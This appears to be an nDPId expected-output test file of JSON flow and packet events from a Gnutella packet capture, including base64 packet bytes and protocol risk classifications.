-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":678,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":83805,"flow_last_seen":84027,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":84027,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50267,"dst_port":9239,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":3,"flow_last_seen":84388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84388,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GYlAAIAGqN4KAAIPXwrNQ8RYvPy3IUp\/AAAAAIAC+vC4zAAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":3,"flow_last_seen":84388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84388,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xOhAAIAGV+wKAAIPSbaIKsRXbOGIdOVZAAAAAIAC+vD3KAAAAgQFtAEDAwgBAQQC"} 
-00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":3,"flow_last_seen":84388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84388,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bsdAAIAGE84KAAIPcf\/6IMRZzacG03PuAAAAAIAC+vDvLQAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":688,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":84592,"flow_last_seen":84592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":84592,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"210.209.249.84","src_port":50268,"dst_port":24751,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":84592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84592,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0v8BAAIAGYs4KAAIP0tH5VMRcYK9pfUzQAAAAAIAC+vDAkAAAAgQFtAEDAwgBAQQC"} 
-00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":689,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":84592,"flow_last_seen":84592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":84592,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.103.139.2","src_port":50269,"dst_port":3186,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":689,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":84592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84592,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0sD9AAIAG2QsKAAIP2meLAsRdDHIwnISEAAAAAIAC+vB8tgAAAgQFtAEDAwgBAQQC"} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":690,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":84593,"flow_last_seen":84593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":84593,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.27.24.95","src_port":50270,"dst_port":11427,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":690,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":84593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84593,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0y5JAAIAGmKgKAAIPchsYX8ReLKPFX+7aAAAAAIAC+vA4WgAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":84593,"flow_last_seen":84593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":84593,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.164.198.27","src_port":50271,"dst_port":60202,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":84593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84593,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KpdAAIAGI14KAAIP2qTGG8Rf6yo8NHW4AAAAAIAC+vBl2QAAAgQFtAEDAwgBAQQC"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":2,"flow_last_seen":84824,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":84824,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAwwAAEAGn4vS0flUCgACD2CvxFwAmkwBaX1M0WAS\/\/+X6wAAAgQFtA=="} 
-00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":3,"flow_last_seen":84824,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":84824,"pkt":"UlQAEjUCCAAn5uVZCABFAAAov8FAAIAGYtkKAAIP0tH5VMRcYK9pfUzRAJpMAlAQ+vC0twAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":84592,"flow_last_seen":84825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":84825,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"210.209.249.84","src_port":50268,"dst_port":24751,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":696,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":2,"flow_last_seen":84862,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":84862,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAw4AAEAGBkbaZ4sCCgACDwxyxF0Am0YBMJyEhWAS\/\/9aEAAAAgQFtA=="} 
-00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":697,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":3,"flow_last_seen":84863,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":84863,"pkt":"UlQAEjUCCAAn5uVZCABFAAAosEBAAIAG2RYKAAIP2meLAsRdDHIwnISFAJtGAlAQ+vB23AAA"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":698,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":84592,"flow_last_seen":84863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":84863,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.103.139.2","src_port":50269,"dst_port":3186,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":85607,"flow_last_seen":85607,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":85607,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.172.184.48","src_port":50272,"dst_port":13298,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":85607,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":85607,"pkt":"UlQAEjUCCAAn5uVZCABFAAA07jxAAIAGRpwKAAIPAay4MMRgM\/L4VuGpAAAAAIAC+vDb4AAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":711,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":85607,"flow_last_seen":85607,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":85607,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.179.18.242","src_port":50273,"dst_port":47329,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":85607,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":85607,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0AtdAAIAGwDkKAAIPGLMS8sRhuOFovA6\/AAAAAIAC+vBHrQAAAgQFtAEDAwgBAQQC"} 
-00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":712,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":85607,"flow_last_seen":85607,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":85607,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"68.174.18.115","src_port":50274,"dst_port":50679,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":712,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":85607,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":85607,"pkt":"UlQAEjUCCAAn5uVZCABFAAA03ztAAIAGuFgKAAIPRK4Sc8RixfcTIeyiAAAAAIAC+vCG0QAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":713,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":85608,"flow_last_seen":85608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":85608,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"122.117.100.78","src_port":50275,"dst_port":9010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":713,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":85608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":85608,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UCdAAIAGv8oKAAIPenVkTsRjIzKhF7fWAAAAAIAC+vBIyQAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":714,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":86639,"flow_last_seen":86639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":86639,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":50276,"dst_port":56070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":86639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":86639,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0EcBAAIAG34AKAAIPYPacfsRk2wZPr5++AAAAAIAC+vDbwgAAAgQFtAEDAwgBAQQC"} 
-00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":715,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":86639,"flow_last_seen":86639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":86639,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":50277,"dst_port":36368,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":715,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":86639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":86639,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0sxxAAIAG7QgKAAIPUrX72sRljhBQLtKuAAAAAIAC+vCkLQAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":716,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":86640,"flow_last_seen":86640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":86640,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.231.59.187","src_port":50278,"dst_port":62234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":716,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":86640,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":86640,"pkt":"UlQAEjUCCAAn5uVZCABFAAA04CNAAIAGre8KAAIPJOc7u8Rm8xqBNdLHAAAAAIAC+vD77wAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":717,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":86641,"flow_last_seen":86641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":86641,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.91.201","src_port":50279,"dst_port":4297,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":717,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":86641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":86641,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0vEFAAIAGZK4KAAIPcfxbycRnEMmMdJG3AAAAAIAC+vCm7gAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":720,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":2,"flow_last_seen":87610,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":87610,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0y5NAAIAGmKcKAAIPchsYX8ReLKPFX+7aAAAAAIAC+vA4WgAAAgQFtAEDAwgBAQQC"} 
-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":2,"flow_last_seen":87611,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":87611,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KphAAIAGI10KAAIP2qTGG8Rf6yo8NHW4AAAAAIAC+vBl2QAAAgQFtAEDAwgBAQQC"} -00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":722,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":87670,"flow_last_seen":87670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":87670,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"99.199.148.6","src_port":50280,"dst_port":4338,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":87670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":87670,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0IMpAAIAG1h0KAAIPY8eUBsRoEPJVbcPeAAAAAIAC+vCBnAAAAgQFtAEDAwgBAQQC"} 
-00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":723,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":87670,"flow_last_seen":87670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":87670,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.134.154.158","src_port":50281,"dst_port":54130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":723,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":87670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":87670,"pkt":"UlQAEjUCCAAn5uVZCABFAAA068NAAIAGCc0KAAIPXoaansRp03KjrVDkAAAAAIAC+vDifQAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":724,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":87671,"flow_last_seen":87671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":87671,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"221.124.66.33","src_port":50282,"dst_port":13060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":724,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":87671,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":87671,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0aolAAIAGZI4KAAIP3XxCIcRqMwT80GtdAAAAAIAC+vDo1QAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":725,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":87671,"flow_last_seen":87671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":87671,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50283,"dst_port":35004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":725,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":87671,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":87671,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0eNtAAIAGqL8KAAIPM0SZ1sRriLxORLlDAAAAAIAC+vBGRgAAAgQFtAEDAwgBAQQC"} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":2,"flow_last_seen":87706,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":87706,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoAyIAAP8G34QzRJnWCgACD4i8xGsAAAAATkS5RFAUAACB9gAA"} 
-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":732,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":3,"flow_last_seen":88219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88219,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0eNxAAIAGqL4KAAIPM0SZ1sRriLxORLlDAAAAAIAC+vBGRgAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":734,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":2,"flow_last_seen":88622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88622,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0AthAAIAGwDgKAAIPGLMS8sRhuOFovA6\/AAAAAIAC+vBHrQAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":735,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":2,"flow_last_seen":88622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88622,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UChAAIAGv8kKAAIPenVkTsRjIzKhF7fWAAAAAIAC+vBIyQAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":2,"flow_last_seen":88622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88622,"pkt":"UlQAEjUCCAAn5uVZCABFAAA07j1AAIAGRpsKAAIPAay4MMRgM\/L4VuGpAAAAAIAC+vDb4AAAAgQFtAEDAwgBAQQC"} 
